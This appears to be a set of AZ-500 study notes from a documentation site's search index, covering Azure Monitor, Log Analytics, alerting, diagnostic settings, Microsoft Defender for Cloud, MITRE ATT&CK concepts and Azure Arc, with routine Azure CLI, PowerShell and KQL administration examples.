                            Prometheus Features:

                            • A multi-dimensional data model with time series data identified by metric name and key/value pairs
• PromQL provides a flexible query language to use this dimensionality.
                            • Time series collection happens via a pull model over Hypertext Transfer Protocol (HTTP)
                            • Pushing time series is supported via an intermediary gateway
                            • Targets are discovered via service discovery or static configuration

                            What is Azure Managed Grafana?

                            Azure Managed Grafana is a data visualization platform built on top of the Grafana software by Grafana Labs. It's built as a fully managed Azure service operated and supported by Microsoft. Grafana helps you combine metrics, logs, and traces into a single user interface. With its extensive support for data sources and graphing capabilities, you can view and analyze your application and infrastructure telemetry data in real-time.

Azure Managed Grafana is optimized for the Azure environment. It works seamlessly with many Azure services. Specifically, for the current preview, it provides the following integration features:

                            • Built-in support for Azure Monitor and Azure Data Explorer
                            • User authentication and access control using Microsoft Entra identities
                            • Direct import of existing charts from the Azure portal

                            Why use Azure Managed Grafana?

Managed Grafana lets you bring together all your telemetry data into one place. It can access various supported data sources, including your data stores in Azure and elsewhere.

                            As a fully managed service, Azure Managed Grafana lets you deploy Grafana without having to deal with setup. The service provides high availability, service level agreement (SLA) guarantees, and automatic software updates.

You can share Grafana dashboards with people inside and outside your organization and allow others to join in for monitoring or troubleshooting. Managed Grafana uses Microsoft Entra ID's centralized identity management, which allows you to control which users can use a Grafana instance, and you can use managed identities to access Azure data stores, such as Azure Monitor.

                            You can create dashboards instantaneously by importing existing charts directly from the Azure portal or by using prebuilt dashboards.

                            Summarizing:

A comparison of the three metric types:
• Sources: native platform metrics come from Azure resources; native custom metrics come from the Azure Monitor agent, Application Insights, or the Representational State Transfer (REST) Application Programming Interface (API); Prometheus metrics (preview) come from an Azure Kubernetes Service (AKS) cluster or any Kubernetes cluster through remote-write.
• Configuration: none for platform metrics; varies by source for custom metrics; Prometheus metrics require enabling Azure Monitor managed service for Prometheus.
• Stored in: the subscription for platform and custom metrics; an Azure Monitor workspace for Prometheus metrics.
• Cost: no for platform metrics; yes for custom metrics; yes for Prometheus metrics (free during preview).
• Aggregation: pre-aggregated for platform and custom metrics; raw data for Prometheus metrics.
• Analyze: Metrics Explorer for platform and custom metrics; Prometheus Query Language (PromQL) and Grafana dashboards for Prometheus metrics.
• Alert: metrics alert rule for platform and custom metrics; Prometheus alert rule for Prometheus metrics.
• Visualize: Workbooks, Azure dashboards, and Grafana for platform and custom metrics; Grafana for Prometheus metrics.
• Retrieve: Azure Command-Line Interface (CLI), Azure PowerShell cmdlets, the REST API, or a client library (.NET, Go, Java, JavaScript, Python) for platform and custom metrics; Grafana for Prometheus metrics.

                            Azure Monitor collects metrics from the following sources. After these metrics are collected in the Azure Monitor metric database, they can be evaluated together regardless of their source:

• Azure resources: Platform metrics are created by Azure resources and give you visibility into their health and performance. Each type of resource creates a distinct set of metrics without any configuration required. Platform metrics are collected from Azure resources at a one-minute frequency unless specified otherwise in the metric's definition.
• Applications: Application Insights creates metrics for your monitored applications to help you detect performance issues and track trends in how your application is used. Values include Server response time and Browser exceptions.
• Virtual machine agents: Metrics are collected from the guest operating system of a virtual machine. You can enable guest operating system (OS) metrics for Windows virtual machines by using the Windows diagnostic extension and for Linux virtual machines by using the InfluxData Telegraf agent.
• Custom metrics: You can define metrics in addition to the standard metrics that are automatically available. You can define custom metrics in your application that are monitored by Application Insights. You can also create custom metrics for an Azure service by using the custom metrics Application Programming Interface (API).
• Kubernetes clusters: Kubernetes clusters typically send metric data to a local Prometheus server that you must maintain. Azure Monitor managed service for Prometheus provides a managed service that collects metrics from Kubernetes clusters and stores them in Azure Monitor Metrics.

                            A common type of log entry is an event, which is collected sporadically.

                            Applications can create custom logs by using the structure that they need.

                            Metric data can even be stored in Logs to combine them with other monitoring data for trending and other data analysis.

KQL (Kusto Query Language). Data in Azure Monitor Logs is retrieved using a log query written with the Kusto Query Language, which allows you to quickly retrieve, consolidate, and analyze collected data. Use Log Analytics to write and test log queries in the Azure portal. It allows you to work with results interactively or pin them to a dashboard to view them with other visualizations.
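A small example of running a log query from the CLI; the workspace GUID is a placeholder, and the SecurityEvent table only exists if that data is being collected:

```
# Top computers by security-event count over the last day.
az monitor log-analytics query \
  --workspace 00000000-0000-0000-0000-000000000000 \
  --analytics-query "SecurityEvent | where TimeGenerated > ago(1d) | summarize count() by Computer | top 10 by count_" \
  --timespan P1D
```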

How security tools use Azure Monitor Logs:

• Microsoft Defender for Cloud stores data that it collects in a Log Analytics workspace, where it can be analyzed with other log data.
• Azure Sentinel stores data from data sources into a Log Analytics workspace.
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#13-enable-log-analytics","title":"1.3. Enable Log Analytics","text":"

                            Log Analytics is the primary tool in the Azure portal for writing log queries and interactively analyzing their results. Even if a log query is used elsewhere in Azure Monitor, you'll typically write and test the query first using Log Analytics.

                            You can start Log Analytics from several places in the Azure portal. The scope of the data available to Log Analytics is determined by how you start it.

                            • Select Logs from the Azure Monitor menu or Log Analytics workspaces menu.
                            • Select Analytics from the Overview page of an Application Insights application.
                            • Select Logs from the menu of an Azure resource.

                            In addition to interactively working with log queries and their results in Log Analytics, areas in Azure Monitor where you will use queries include the following:

                            • Alert rules. Alert rules proactively identify issues from data in your workspace. Each alert rule is based on a log search that is automatically run at regular intervals. The results are inspected to determine if an alert should be created.
                            • Dashboards. You can pin the results of any query into an Azure dashboard which allow you to visualize log and metric data together and optionally share with other Azure users.
                            • Views. You can create visualizations of data to be included in user dashboards with View Designer. Log queries provide the data used by tiles and visualization parts in each view.
                            • Export. When you import log data from Azure Monitor into Excel or Power BI, you create a log query to define the data to export.
• PowerShell. Use the results of a log query in a PowerShell script from a command line or an Azure Automation runbook that uses Invoke-AzOperationalInsightsQuery.
                            • Azure Monitor Logs API. The Azure Monitor Logs API allows any REST API client to retrieve log data from the workspace. The API request includes a query that is run against Azure Monitor to determine the data to retrieve.

At the center of Log Analytics is the Log Analytics workspace, which is hosted in Azure:
• Log Analytics collects data in the workspace from connected sources by configuring data sources and adding solutions to your subscription.
• Data sources and solutions each create different record types, each with its own set of properties.
• You can still analyze sources and solutions together in queries to the workspace.
• A Log Analytics workspace is a unique environment for Azure Monitor log data.
• Each workspace has its own data repository and configuration, and data sources and solutions are configured to store their data in a particular workspace.
• You require a Log Analytics workspace if you intend to collect data from the following sources: Azure resources in your subscription, on-premises computers monitored by System Center Operations Manager, device collections from Configuration Manager, and diagnostics or log data from Azure Storage.
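Creating a workspace is a one-liner; a sketch with placeholder names:

```
az monitor log-analytics workspace create \
  --resource-group myrg \
  --workspace-name myworkspace \
  --location westeurope
```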

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#14-manage-connected-sources-for-log-analytics","title":"1.4. Manage connected sources for log analytics","text":"
                            • The Azure Log Analytics agent was developed for comprehensive management across virtual machines in any cloud, on-premises machines, and those monitored by System Center Operations Manager.
                            • The Windows and Linux agents send collected data from different sources to your Log Analytics workspace in Azure Monitor, as well as any unique logs or metrics as defined in a monitoring solution.
                            • The Log Analytics agent also supports insights and other services in Azure Monitor such as Azure Monitor for VMs, Microsoft Defender for Cloud, and Azure Automation.

There is also the Azure Diagnostics extension, which collects monitoring data from the guest operating system of Azure virtual machines. The differences:

• Azure Diagnostics extension: used only with Azure virtual machines; sends data to Azure Storage, Azure Monitor Metrics (Windows only), and Event Hubs; not specifically required by other services.
• Log Analytics agent: used with virtual machines in Azure, other clouds, and on-premises; sends data to Azure Monitor Logs (to a Log Analytics workspace); required for Azure Monitor for VMs and other services such as Microsoft Defender for Cloud.

The Windows agent can be multihomed to send data to multiple workspaces and System Center Operations Manager management groups; the Linux agent can send to only a single destination. The agent for Linux and Windows isn't only for connecting to Azure Monitor; it also supports Azure Automation to host the Hybrid Runbook Worker role and other services such as Change Tracking, Update Management, and Microsoft Defender for Cloud.
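On an Azure VM, the (now legacy) Log Analytics agent could be attached as a VM extension; a sketch with placeholder names, noting that this agent has since been superseded by the Azure Monitor agent:

```
# Attach the legacy Log Analytics agent to a Linux VM and point it at a workspace.
az vm extension set \
  --resource-group myrg --vm-name myvm \
  --name OmsAgentForLinux \
  --publisher Microsoft.EnterpriseCloud.Monitoring \
  --settings '{"workspaceId":"<workspace-guid>"}' \
  --protected-settings '{"workspaceKey":"<workspace-key>"}'
```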

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#15-enable-azure-monitor-alerts","title":"1.5. Enable Azure monitor Alerts","text":"

Azure Monitor has metrics, logging, and analytics features. Another feature is alerts.

                            Alerts in Azure Monitor proactively notify you of critical conditions and potentially attempt to take corrective action. Alert rules based on metrics provide near real time alerting based on numeric values, while rules based on logs allow for complex logic across data from multiple sources.

                            The unified alert experience in Azure Monitor includes alerts that were previously managed by Log Analytics and Application Insights. In the past, Azure Monitor, Application Insights, Log Analytics, and Service Health had separate alerting capabilities. Over time, Azure improved and combined both the user interface and different methods of alerting. The consolidation is still in process.

• The alert rule captures the target and criteria for alerting. The alert rule can be in an enabled or a disabled state. Alerts only fire when enabled. (A CLI sketch of a complete rule follows this list.)
                            • Target Resource: Defines the scope and signals available for alerting. A target can be any Azure resource. Example targets: a virtual machine, a storage account, a virtual machine scale set, a Log Analytics workspace, or an Application Insights resource. For certain resources (like virtual machines), you can specify multiple resources as the target of the alert rule.
                            • Signal: Emitted by the target resource. Signals can be of the following types: metric, activity log, Application Insights, and log.
                            • Criteria: A combination of signal and logic applied on a target resource. Examples:
                              • Percentage CPU > 70%
                              • Server Response Time > 4 ms
                              • Result count of a log query > 100
                            • Alert Name: A specific name for the alert rule configured by the user.
                            • Alert Description: A description for the alert rule configured by the user.
                            • Severity: The severity of the alert after the criteria specified in the alert rule is met. Severity can range from 0 to 4.
                              • Sev 0 = Critical
                              • Sev 1 = Error
                              • Sev 2 = Warning
                              • Sev 3 = Informational
                              • Sev 4 = Verbose
                            • Action: A specific action taken when the alert is fired.
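Putting those pieces together, here is a CLI sketch of a metric alert rule; the scope, names, and action group are placeholders:

```
# Fire a Sev 2 alert when average CPU on a VM exceeds 70%.
az monitor metrics alert create \
  --name cpu-high \
  --resource-group myrg \
  --scopes "/subscriptions/<sub-id>/resourceGroups/myrg/providers/Microsoft.Compute/virtualMachines/myvm" \
  --condition "avg Percentage CPU > 70" \
  --severity 2 \
  --description "CPU above 70% for the evaluation window" \
  --action myactiongroup
```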

                            You can alert on metrics and logs. These include but are not limited to:

                            • Metric values
                            • Log search queries
                            • Activity log events
                            • Health of the underlying Azure platform
                            • Tests for website availability

                            With the consolidation of alerting services still in process, there are some alerting capabilities that are not yet in the new alerts system.

• Service health (signal type: activity log): not supported in the new alerts system. View Create activity log alerts on service notifications.
• Application Insights (signal type: web availability tests): not supported in the new alerts system. View Web test alerts. Available to any website that's instrumented to send data to Application Insights. Receive a notification when availability or responsiveness of a website is below expectations.","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#16-create-diagnostic-settings-in-azure-portal","title":"1.6. Create diagnostic settings in Azure portal","text":"

                            Azure Monitor diagnostic logs are logs produced by an Azure service that provide rich, frequently collected data about the operation of that service. Azure Monitor makes two types of diagnostic logs available:

                            • Tenant logs. These logs come from tenant-level services that exist outside an Azure subscription, such as Microsoft Entra ID.
                            • Resource logs. These logs come from Azure services that deploy resources within an Azure subscription, such as Network Security Groups (NSGs) or storage accounts.

These logs differ from the activity log. The activity log provides insight into the operations, such as creating a VM or deleting a logic app, that Azure Resource Manager performed on resources in your subscription. The activity log is a subscription-level log. Resource-level diagnostic logs provide insight into operations that were performed within that resource itself, such as getting a secret from a key vault.

These logs also differ from guest operating system (OS)-level diagnostic logs. Guest OS diagnostic logs are those collected by an agent running inside a VM or other supported resource type. Resource-level diagnostic logs require no agent and capture resource-specific data from the Azure platform itself, whereas guest OS-level diagnostic logs capture data from the OS and applications running on a VM.

                            You can configure diagnostic settings in the Azure portal either from the Azure Monitor menu or from the menu for the resource.
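The same setting can be scripted; a sketch sending a network security group's resource logs to a Log Analytics workspace (all names and IDs are placeholders):

```
az monitor diagnostic-settings create \
  --name nsg-to-logs \
  --resource "/subscriptions/<sub-id>/resourceGroups/myrg/providers/Microsoft.Network/networkSecurityGroups/mynsg" \
  --workspace "/subscriptions/<sub-id>/resourceGroups/myrg/providers/Microsoft.OperationalInsights/workspaces/myworkspace" \
  --logs '[{"category":"NetworkSecurityGroupEvent","enabled":true},{"category":"NetworkSecurityGroupRuleCounter","enabled":true}]'
```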

                            Here are some of the things you can do with diagnostic logs:

• Save them to a storage account for auditing or manual inspection. You can specify the retention time (in days) by using resource diagnostic settings.
• Stream them to event hubs for ingestion by a third-party service or custom analytics solution, such as Power BI. An event hub is created in the namespace for each log category you enable (a diagnostic log category is a type of log that a resource may collect).
• Analyze them with Azure Monitor, such that the data is immediately written to Azure Monitor with no need to first write the data to storage.
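As a sketch of the configuration described above, assuming the Az.Monitor module (3.x) and hypothetical resource IDs throughout, a diagnostic setting that routes a key vault's AuditEvent logs to a Log Analytics workspace could look like this:

```powershell
# Log settings object: enable the AuditEvent category (placeholder category)
$log = New-AzDiagnosticSettingLogSettingsObject -Category AuditEvent -Enabled $true

# Create the diagnostic setting on the resource; both IDs are placeholders
New-AzDiagnosticSetting -Name "send-to-workspace" `
    -ResourceId "/subscriptions/<sub-id>/resourceGroups/rg-sec/providers/Microsoft.KeyVault/vaults/kv-demo" `
    -WorkspaceId "/subscriptions/<sub-id>/resourceGroups/rg-monitoring/providers/Microsoft.OperationalInsights/workspaces/law-demo" `
    -Log $log
```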

Kusto Query Language (KQL). All data in a Log Analytics workspace is retrieved using log queries written in KQL. You can write your own queries or use solutions and insights that include log queries for an application or service.
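A minimal sketch of running a KQL log query from PowerShell, assuming the Az.OperationalInsights module; the workspace GUID and the query itself are illustrative only:

```powershell
# Illustrative KQL: failed vs. successful sign-ins over the last 24 hours
$kql = @"
SigninLogs
| where TimeGenerated > ago(24h)
| summarize count() by ResultType
"@

# WorkspaceId is the workspace's customer ID (a GUID), shown here as a placeholder
$result = Invoke-AzOperationalInsightsQuery -WorkspaceId "<workspace-guid>" -Query $kql
$result.Results | Format-Table
```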

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#2-enable-and-manage-microsoft-defender-for-cloud","title":"2. Enable and manage Microsoft Defender for Cloud","text":"

                            Microsoft Defender for Cloud is your central location for setting and monitoring your organization's security posture.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#21-the-mitre-attack-matrix","title":"2.1. The MITRE Attack matrix","text":"

                            The MITRE ATT&CK matrix is a\u00a0publicly accessible knowledge base\u00a0for understanding the various\u00a0tactics\u00a0and\u00a0techniques\u00a0used by attackers during a cyberattack.

                            The knowledge base is organized into several categories:\u00a0pre-attack,\u00a0initial access,\u00a0execution,\u00a0persistence,\u00a0privilege escalation,\u00a0defense evasion,\u00a0credential access,\u00a0discovery,\u00a0lateral movement,\u00a0collection,\u00a0exfiltration, and\u00a0command and control.

                            Tactics (T)\u00a0represent the \"why\" of an ATT&CK technique or sub-technique. It is the adversary's tactical goal: the reason for performing an action.\u00a0For example, an adversary may want to achieve credential access.

                            Techniques (T)\u00a0represent \"how'\" an adversary achieves a tactical goal by performing an action.\u00a0For example, an adversary may dump credentials to achieve credential access.

                            Common Knowledge (CK)\u00a0in ATT&CK stands for common knowledge, essentially the documented modus operandi of tactics and techniques executed by adversaries.

                            Defender for Cloud\u00a0uses the MITRE Attack matrix to associate alerts with their perceived intent, helping formalize security domain knowledge.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#22-implement-microsoft-defender-for-cloud","title":"2.2. Implement Microsoft Defender for Cloud","text":"

Microsoft Defender for Cloud is a solution for cloud security posture management (CSPM) and cloud workload protection (CWP) that finds weak spots across your cloud configuration, helps strengthen the overall security posture of your environment, and can protect workloads across multicloud and hybrid environments from evolving threats.

When necessary, Defender for Cloud can automatically deploy a Log Analytics agent to gather security-related data. For Azure machines, deployment is handled directly. For hybrid and multicloud environments, Microsoft Defender plans are extended to non-Azure machines with the help of Azure Arc. Cloud Security Posture Management (CSPM) features are extended to multicloud machines without the need for any agents.

In addition to defending your Azure environment, you can add Defender for Cloud capabilities to your hybrid cloud environment to protect your non-Azure servers. To extend protection to on-premises machines, deploy Azure Arc and enable Defender for Cloud's enhanced security features.

                            For example, if you've connected an Amazon Web Services (AWS) account to an Azure subscription, you can enable any of these protections:

• Defender for Cloud's CSPM features extend to your AWS resources. This agentless plan assesses your AWS resources according to AWS-specific security recommendations, and these are included in your secure score. The resources will also be assessed for compliance with built-in standards specific to AWS (AWS Center for Internet Security (CIS), AWS Payment Card Industry (PCI) Data Security Standards (DSS), and AWS Foundational Security Best Practices). Defender for Cloud's asset inventory page is a multicloud-enabled feature helping you manage your AWS resources alongside your Azure resources.
• Microsoft Defender for Kubernetes extends its container threat detection and advanced defenses to your Amazon Elastic Kubernetes Service (EKS) Linux clusters.
• Microsoft Defender for Servers brings threat detection and advanced defenses to your Windows and Linux Elastic Compute Cloud 2 (EC2) instances. This plan includes the integrated license for Microsoft Defender for Endpoint, security baselines, and OS-level assessments, vulnerability assessment scanning, adaptive application controls (AAC), file integrity monitoring (FIM), and more.

Defender for Cloud includes vulnerability assessment solutions for virtual machines, container registries, and SQL servers as part of the enhanced security features. Some of the scanners are powered by Qualys. But you don't need a Qualys license or even a Qualys account - everything's handled seamlessly inside Defender for Cloud.

                            Microsoft Defender for Servers includes automatic, native integration with Microsoft Defender for Endpoint. With this integration enabled, you'll have access to the vulnerability findings from Microsoft Defender Vulnerability Management.

The list of recommendations is enabled and supported by the Microsoft cloud security benchmark. This Microsoft-authored benchmark, based on common compliance frameworks, began with Azure and now provides a set of guidelines for security and compliance best practices for multiple cloud environments. In this way, Defender for Cloud enables you not just to set security policies but to apply secure configuration standards across your resources.

Microsoft Defender for the Internet of Things (IoT) is a separate product.

The Defender plans of Microsoft Defender for Cloud offer comprehensive defenses for the compute, data, and service layers of your environment:

                            • Microsoft Defender for Servers
                            • Microsoft Defender for Storage
                            • Microsoft Defender for Structured Query Language (SQL)
                            • Microsoft Defender for Containers
                            • Microsoft Defender for App Service
                            • Microsoft Defender for Key Vault
                            • Microsoft Defender for Resource Manager
                            • Microsoft Defender for Domain Name System (DNS)
                            • Microsoft Defender for open-source relational databases
                            • Microsoft Defender for Azure Cosmos Database (DB)
                            • Defender Cloud Security Posture Management (CSPM)
                              • Security governance and regulatory compliance
                              • Cloud security explorer
                              • Attack path analysis
                              • Agentless scanning for machines
                            • Defender for DevOps
• Security alerts - When Defender for Cloud detects a threat in any area of your environment, it generates a security alert. These alerts describe details of the affected resources, suggested remediation steps, and in some cases, an option to trigger a logic app in response. Whether an alert is generated by Defender for Cloud or received by Defender for Cloud from an integrated security product, you can export it. To export your alerts to Microsoft Sentinel, any third-party security information and event management (SIEM) system, or any other external tool, follow the instructions in Stream alerts to a SIEM, Security orchestration, automation and response (SOAR), or IT Service Management solution. Defender for Cloud's threat protection includes fusion kill-chain analysis, which automatically correlates alerts in your environment based on cyber kill-chain analysis, to help you better understand the full story of an attack campaign, where it started, and what kind of impact it had on your resources. Defender for Cloud's supported kill chain intents are based on version 9 of the MITRE ATT&CK matrix.
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#23-cloud-security-posture-management-cspm-remediate-security-issues-and-watch-your-security-posture-improve-security-posture-tab-regulatory-compliance-tab","title":"2.3. Cloud Security Posture Management (CSPM) - Remediate security issues and watch your security posture improve - Security posture tab + Regulatory compliance tab","text":"

                            Defender for Cloud continually assesses your resources, subscriptions, and organization for security issues and shows your security posture in the secure score, an aggregated score of the security findings that tells you, at a glance, your current security situation: the higher the score, the lower the identified risk level.

• Generates a secure score for your subscriptions based on an assessment of your connected resources compared with the guidance in the Microsoft cloud security benchmark.
• Provides hardening recommendations based on any identified security misconfigurations and weaknesses.
• Analyzes and secures your attack paths through the cloud security graph, which is a graph-based context engine that exists within Defender for Cloud. The cloud security graph collects data from your multicloud environment and other data sources.
• Attack path analysis is a graph-based algorithm that scans the cloud security graph. The scans expose exploitable paths attackers may use to breach your environment and reach your high-impact assets.
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#24-workload-protections-tab","title":"2.4. Workload protections tab","text":"

                            Defender for Cloud offers security alerts that are powered by Microsoft Threat Intelligence. It also includes a range of advanced, intelligent protections for your workloads. The workload protections are provided through Microsoft Defender plans specific to the types of resources in your subscriptions.

                            The Cloud workload dashboard includes the following sections:

1. Microsoft Defender for Cloud coverage - Here you can see the resource types in your subscription that are eligible for protection by Defender for Cloud. Wherever relevant, you can upgrade here as well. If you want to upgrade all possible eligible resources, select Upgrade all.
2. Security alerts - When Defender for Cloud detects a threat in any area of your environment, it generates an alert. These alerts describe details of the affected resources, suggested remediation steps, and in some cases an option to trigger a logic app in response. Selecting anywhere in this graph opens the Security alerts page.
3. Advanced protection - Defender for Cloud includes many advanced threat protection capabilities for virtual machines, Structured Query Language (SQL) databases, containers, web applications, your network, and more. In this advanced protection section, you can see the status of the resources in your selected subscriptions for each of these protections. Select any of them to go directly to the configuration area for that protection type.
4. Insights - This rolling pane of news, suggested reading, and high-priority alerts gives Defender for Cloud's insights into pressing security matters that are relevant to you and your subscription. Whether it's a list of high-severity Common Vulnerabilities and Exposures (CVEs) discovered on your VMs by a vulnerability analysis tool, or a new blog post by a member of the Defender for Cloud team, you'll find it here in the Insights panel.
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#25-deploy-microsoft-defender-for-cloud","title":"2.5. Deploy Microsoft Defender for Cloud","text":"

Defender for Cloud provides foundational cloud security posture management (CSPM) features by default.

Defender for Cloud offers foundational multicloud CSPM capabilities for free. The foundational CSPM includes a secure score, security policy and basic recommendations, and network security assessment to help you protect your Azure resources.

The optional Defender CSPM plan provides advanced posture management capabilities such as attack path analysis, cloud security explorer, advanced threat hunting, and security governance capabilities, as well as tools to assess your security compliance with a wide range of benchmarks, regulatory standards, and any custom security policies required in your organization, industry, or region.

When you enable Defender plans on an entire Azure subscription, the protections are inherited by all resources in the subscription. When you enable the enhanced security features (paid), Defender for Cloud can provide unified security management and threat protection across your hybrid cloud workloads, including:

• Microsoft Defender for Endpoint - Microsoft Defender for Servers includes Microsoft Defender for Endpoint for comprehensive endpoint detection and response (EDR).

• Vulnerability assessment for virtual machines, container registries, and SQL resources

• Multicloud security - Connect your accounts from Amazon Web Services (AWS) and Google Cloud Platform (GCP) to protect resources and workloads on those platforms with a range of Microsoft Defender for Cloud security features.

• Hybrid security - Get a unified view of security across all of your on-premises and cloud workloads.

• Threat protection alerts - Advanced behavioral analytics and the Microsoft Intelligent Security Graph provide an edge over evolving cyber-attacks. Built-in behavioral analytics and machine learning can identify attacks and zero-day exploits. Monitor networks, machines, data stores (SQL servers hosted inside and outside Azure, Azure SQL databases, Azure SQL Managed Instance, and Azure Storage), and cloud services for incoming attacks and post-breach activity. Streamline investigation with interactive tools and contextual threat intelligence.

• Track compliance with a range of standards - Defender for Cloud continuously assesses your hybrid cloud environment to analyze the risk factors according to the controls and best practices in the Microsoft cloud security benchmark. When you enable enhanced security features, you can apply a range of other industry standards, regulatory standards, and benchmarks according to your organization's needs. Add standards and track your compliance with them from the regulatory compliance dashboard.

• Access and application controls - Block malware and other unwanted applications by applying machine learning-powered recommendations adapted to your specific workloads to create allowlists and blocklists. Reduce the network attack surface with just-in-time, controlled access to management ports on Azure VMs. Access and application controls drastically reduce exposure to brute force and other network attacks.

• Container security features - Benefit from vulnerability management and real-time threat protection in your containerized environments. Charges are based on the number of unique container images pushed to your connected registry. After an image has been scanned once, you won't be charged for it again unless it's modified and pushed once more.

• Breadth threat protection for resources connected to Azure - Cloud-native threat protection for the Azure services common to all of your resources: Azure Resource Manager, Azure Domain Name System (DNS), Azure network layer, and Azure Key Vault. Defender for Cloud has unique visibility into the Azure management layer and the Azure DNS layer and can therefore protect cloud resources that are connected to those layers.

Manage your Cloud Security Posture Management (CSPM) - CSPM offers you the ability to remediate security issues and review your security posture through the tools provided. These tools include:

• Security governance and regulatory compliance
  • What is security governance and regulatory compliance? Security governance and regulatory compliance refer to the policies and processes which organizations have in place to ensure that they comply with laws, rules, and regulations put in place by external bodies (government) that control activity in a given jurisdiction. Defender for Cloud allows you to view your regulatory compliance through the regulatory compliance dashboard. Defender for Cloud continuously assesses your hybrid cloud environment to analyze the risk factors according to the controls and best practices in the standards you've applied to your subscriptions. The dashboard reflects the status of your compliance with these standards.
• Cloud security graph
  • What is a cloud security graph? The cloud security graph is a graph-based context engine that exists within Defender for Cloud. The cloud security graph collects data from your multicloud environment and other data sources. For example: the cloud assets inventory, connections and lateral movement possibilities between resources, exposure to the internet, permissions, network connections, vulnerabilities, and more. The data collected is then used to build a graph representing your multicloud environment. Defender for Cloud then uses the generated graph to perform an attack path analysis and find the issues with the highest risk that exist within your environment. You can also query the graph using the cloud security explorer.
• Attack path analysis
  • What is attack path analysis? Attack path analysis helps you to address the security issues that pose immediate threats with the greatest potential of being exploited in your environment. Defender for Cloud analyzes which security issues are part of potential attack paths that attackers could use to breach your environment. It also highlights the security recommendations that need to be resolved in order to mitigate the issue.
• Agentless scanning for machines
  • What is agentless scanning for machines? Microsoft Defender for Cloud maximizes coverage on OS posture issues and extends beyond the reach of agent-based assessments. With agentless scanning for VMs, you can get frictionless, wide, and instant visibility on actionable posture issues without installed agents, network connectivity requirements, or machine performance impact. Agentless scanning for VMs provides vulnerability assessment and software inventory powered by Defender vulnerability management in Azure and Amazon AWS environments. Agentless scanning is available in Defender Cloud Security Posture Management (CSPM) and Defender for Servers.
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#26-azure-arc","title":"2.6. Azure Arc","text":"

                            Azure Arc provides a centralized, unified way to:

                            • Manage your entire environment together by projecting your existing non-Azure and/or on-premises resources into Azure Resource Manager.
                            • Manage virtual machines, Kubernetes clusters, and databases as if they are running in Azure.
                            • Use familiar Azure services and management capabilities, regardless of where they live.
                            • Continue using traditional IT operations (ITOps) while introducing DevOps practices to support new cloud-native patterns in your environment.
                            • Configure custom locations as an abstraction layer on top of Azure Arc-enabled Kubernetes clusters and cluster extensions.

                            Currently, Azure Arc allows you to manage the following resource types hosted outside of Azure:

                            • Servers: Manage Windows and Linux physical servers and virtual machines hosted outside of Azure.
                            • Kubernetes clusters: Attach and configure Kubernetes clusters running anywhere with multiple supported distributions.
                            • Azure data services: Run Azure data services on-premises, at the edge, and in public clouds using Kubernetes and the infrastructure of your choice. SQL Managed Instance and PostgreSQL server (preview) services are currently available.
                            • SQL Server: Extend Azure services to SQL Server instances hosted outside of Azure.
• Virtual machines (preview): Provision, resize, delete, and manage virtual machines based on VMware vSphere or Azure Stack hyper-converged infrastructure (HCI) and enable VM self-service through role-based access.

                            Some of the key scenarios that Azure Arc supports are:

                            • Implement consistent inventory, management, governance, and security for servers across your environment.
                            • Configure Azure VM extensions to use Azure management services to monitor, secure, and update your servers.
                            • Manage and govern Kubernetes clusters at scale.
                            • Use GitOps to deploy configuration across one or more clusters from Git repositories.
                            • Zero-touch compliance and configuration for Kubernetes clusters using Azure Policy.
                            • Run Azure data services on any Kubernetes environment as if it runs in Azure (specifically Azure SQL Managed Instance and Azure Database for PostgreSQL server, with benefits such as upgrades, updates, security, and monitoring). Use elastic scale and apply updates without any application downtime, even without continuous connection to Azure.
                            • Create custom locations on top of your Azure Arc-enabled Kubernetes clusters, using them as target locations for deploying Azure services instances. Deploy your Azure service cluster extensions for Azure Arc-enabled data services, App services on Azure Arc (including web, function, and logic apps), and Event Grid on Kubernetes.
• Perform virtual machine lifecycle and management operations for VMware vSphere and Azure Stack hyper-converged infrastructure (HCI) environments.
• Get a unified experience viewing your Azure Arc-enabled resources, whether you are using the Azure portal, the Azure CLI, Azure PowerShell, or the Azure REST API.
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#27-microsoft-cloud-security-benchmark","title":"2.7. Microsoft cloud security benchmark","text":"

                            Located at Defender > Regulatory compliance

The Microsoft cloud security benchmark (MCSB) provides prescriptive best practices and recommendations to help improve the security of workloads, data, and services on Azure and your multi-cloud environment, focusing on cloud-centric control areas with input from a set of holistic Microsoft and industry security guidance that includes:

• Cloud Adoption Framework: Guidance on security, including strategy, roles and responsibilities, Azure Top 10 Security Best Practices, and reference implementation.
                            • Azure Well-Architected Framework: Guidance on securing your workloads on Azure.
                            • The Chief Information Security Officer (CISO) Workshop: Program guidance and reference strategies to accelerate security modernization using Zero Trust principles.
                            • Other industry and cloud service provider's security best practice standards and framework: Examples include the Amazon Web Services (AWS) Well-Architected Framework, Center for Internet Security (CIS) Controls, National Institute of Standards and Technology (NIST), and Payment Card Industry Data Security Standard (PCI-DSS).
Control domains covered by the benchmark:

• Network security (NS): Controls to secure and protect networks, including securing virtual networks, establishing private connections, preventing and mitigating external attacks, and securing Domain Name System (DNS).
• Identity Management (IM): Controls to establish secure identity and access controls using identity and access management systems, including the use of single sign-on, strong authentication, managed identities (and service principals) for applications, conditional access, and account anomaly monitoring.
• Privileged Access (PA): Controls to protect privileged access to your tenant and resources, including a range of controls to protect your administrative model, administrative accounts, and privileged access workstations against deliberate and inadvertent risk.
• Data Protection (DP): Controls for data protection at rest, in transit, and via authorized access mechanisms, including discovering, classifying, protecting, and monitoring sensitive data assets using access control, encryption, key management, and certificate management.
